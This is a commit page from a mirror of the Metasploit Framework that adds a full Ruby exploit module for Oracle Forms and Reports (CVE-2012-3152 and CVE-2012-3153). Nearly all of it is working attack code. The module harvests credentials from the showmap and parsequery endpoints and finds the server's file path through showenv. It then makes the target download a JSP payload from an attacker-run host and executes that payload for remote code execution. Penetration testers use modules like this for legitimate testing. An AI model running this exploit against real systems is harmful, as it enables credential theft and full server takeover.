infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

added module for Oracle Forms and Reports

bug/bundler_fix
Mekanismen 2014-01-30 14:45:17 +01:00
parent de1a29c6fa
commit e7ab77c736
1 changed files with 223 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

223
modules/exploits/multi/http/oracle_reports_rce.rb Normal file
View File

@ -0,0 +1,223 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'uri'
require 'open-uri'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpServer::HTML
Rank = GreatRanking
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle Forms and Reports',
'Description' => %q{
This module enumerates possible vulnerable credentials in the /showmap url. Vulnerable credentials can then be used to query
the /showenv url for a local filepath that is reachable from an URL. A shell can be uploaded to this path using URLPARAMETER.
This allows us to execute arbitrary code on the server. Tested on Linux and Oracle Forms and Reports 11.1.
},
'Author' =>
[
'miss_sudo', # Vulnerability discovery
'Mekanismen <mattias[at]gotroot.eu>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ "CVE", "2012-3152" ],
[ "CVE", "2012-3153" ],
[ "EDB", "31253" ],
[ 'URL', "http://netinfiltration.com" ]
],
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
[ 'Linux',
{
'Arch' => ARCH_JAVA,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 15 2014'
))
register_options(
[
OptString.new('EXTURL', [false, 'An alternative host to request the payload from', "" ]),
OptString.new('OPTDIR', [false, 'An alternative folder to download payload to', "" ]),
OptInt.new('HTTPDELAY', [false, 'Time that the HTTP Server will wait for the payload request', 10]),
])
end
def check
url = datastore['RHOST']
url = "http://" + url + "/reports/rwservlet/showmap"
uri = URI.parse(url)
begin
html = uri.open.read
rescue
return Exploit::CheckCode::Safe
end
if html =~ /Reports Servlet Key Map/
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
def exploit
@hacked = false
@payload_url = ""
@payload_name = rand_text_alpha(8+rand(8)) + ".jsp"
@payload_dir = ""
@local_path = ""
@pl = payload.encoded
if datastore['OPTDIR'].blank?
@payload_dir = "/examples/"
else
@payload_dir = datastore['OPTDIR']
end
@url = datastore['RHOST']
url = "http://" + @url + "/reports/rwservlet/showmap"
uri = URI.parse(url)
begin
html = uri.open.read
rescue
fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL")
end
test = html.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten
#Parse keymaps for servers
print_status "#{peer} - Enumerating keymaps ... "
uri = target_uri.path
test.each do |t|
if not @hacked
t = t.delete(' ')
res = send_request_cgi({
'uri' => normalize_uri(uri, "/reports/rwservlet/parsequery?#{t}"),
'method' => 'GET',
})
if res and res.code == 200
if res.body =~ /userid=(.*)@/
authid = $1
end
if res.body =~ /server=(\S*)/
server = $1
end
end
if server and authid
getenv(server, authid)
end
end
end
if @hacked
else
print_status "#{peer} - Enumeration done ... no vulnerable keymaps for automatic explotation found"
end
end
def getenv(server, authid)
print_good "#{peer} - Found server: #{server}"
print_good "#{peer} - Found credentials: #{authid}"
print_status "#{peer} - Querying showenv ..."
url = "http://" + @url + "/reports/rwservlet/showenv?server=#{server}&authid=#{authid}"
uri = URI.parse(url)
begin
html = uri.open.read
rescue
print_status("#{peer} - Query failed")
else
if html =~ /\\(.*)\\showenv/
print_good "#{peer} - Query succeeded!"
print_status "#{peer} - Windows install detected "
print_status "#{peer} - Uploading payload ..."
@local_path = $1.gsub("\\", "/")
local_server_run()
elsif html =~ /\/(.*)\/showenv/
print_good "#{peer} - Query succeeded!"
print_status "#{peer} - Linux install detected"
print_status "#{peer} - Uploading payload ..."
@local_path = $1
local_server_run()
else
print_status "#{peer} - Query failed"
end
end
end
def primer
@payload_url = get_uri
upload_payload
end
def on_request_uri(cli, request)
if request.uri =~ /#{get_resource}/
send_response(cli, @pl)
end
end
def local_server_run()
if datastore['EXTURL'].blank?
begin
Timeout.timeout(datastore['HTTPDELAY']) {super}
rescue Timeout::Error
end
exec_payload
else
@payload_url = datastore['EXTURL']
upload_payload
exec_payload
end
end
def exec_payload
uri = target_uri.path
print_status("#{peer} - Our payload is at: #{peer}/reports#{@payload_dir}#{@payload_name}")
print_status("#{peer} - Executing payload...")
url = "/reports#{@payload_dir}#{@payload_name}"
res = send_request_cgi({
'uri' => normalize_uri(uri, url),
'method' => 'GET'
})
end
def upload_payload()
path = "/#{@local_path}#{@payload_dir}#{@payload_name}"
uri = target_uri.path
res = send_request_cgi({
'uri' => normalize_uri(uri, "/reports/rwservlet"),
'method' => 'GET',
'encode_params' => false,
'vars_get' => {
'report' => 'test.rdf',
'desformat' => 'html',
'destype' => 'file',
'desname' => path,
'JOBTYPE' => 'rwurl',
'URLPARAMETER' => @payload_url
}
})
if res.body =~ /Successfully run/
@hacked = true
print_good "#{peer} - Payload uploaded!"
else
print_status "#{peer} - Payload upload failed"
end
end
end